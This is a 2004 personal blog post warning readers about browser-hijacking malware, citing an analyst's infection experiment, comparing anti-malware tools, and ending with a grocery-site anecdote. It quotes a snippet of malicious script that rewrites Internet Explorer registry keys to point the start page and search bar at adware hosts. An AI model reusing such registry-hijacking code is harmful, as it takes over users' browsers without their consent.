Tuesday, July 27, 2004

 

Technology, what a concept

Short shrift today because of D&D (minor deities and daemons) consuming all of my cycles.

This article documents a controlled experiment using a VMWare instance of XP Home where a security analyst deliberately let the system be infected by malware. If you need still a reason to turn off Javascript, read this through. These malware purveyors are real cuties, encoding in hex a bunch of code that will replace your default homepage and search engine with their (ahem) value added code, and destroy your ability to use Windows Media Player, not to mention downloading a stub program that will further download various trojans to your desktop.

An example of the cute code (and whatever you do, do not go to the URLs in the code unless you know what you're doing! Repeat, there be dragons)

wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",   "http://default-homepage-network.com/start.cgi?new-hkcu");wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",   "http://default-homepage-network.com/start.cgi?new-hklm");wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",   "http://server224.smartbotpro.net/7search/?new-hkcu");wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no");wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",  "http://server224.smartbotpro.net/7search/?new-hklm");wsh.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst", "no"

The code begs the question as to why things such as this can have write permission to sensitive keys in the registry without at least some form of confirmation, but you can leave that for the next MSFT shareholders' meeting. You've been warned.

One thing that may help is a utility called BOClean. It's certainly a great idea, has gotten very good reviews, and it's certainly much easier on system resources than Norton Anti Virus. I'm rather down on NAV lately, as the 2004 edition has gotten incredibly bloated, and absolutely gummed up several systems here at Beobachterschloss  Am Berg.  The 2002 version is much lighter in footprint, and even caught a couple of trojan attempts when I was wandering far from my usual haunts in search of ever newer goodies to opine on. SpywareBlaster and the immunize features from the various scanners are still a primary line of defense, though.

An article in the local paper indicated that Peapod has extended its service to my town, and I decided to check it out. The Mrs. was only mildly interested, but Mom was quite curious about  saving the schlep to the market. So we took a look at the kosher offerings, and it was the usual supermarket stuff (Empire turkeys, Hebrew National franks), but the rotating promotional ads below gave us a huge belly laugh. It seems that their ad server thought that people perusing the kosher section would also be interested in scallops wrapped in bacon, brown and serve sausage, and pasteurized crabmeat.


|

<< Home

This page is powered by Blogger. Isn't yours?

Technorati search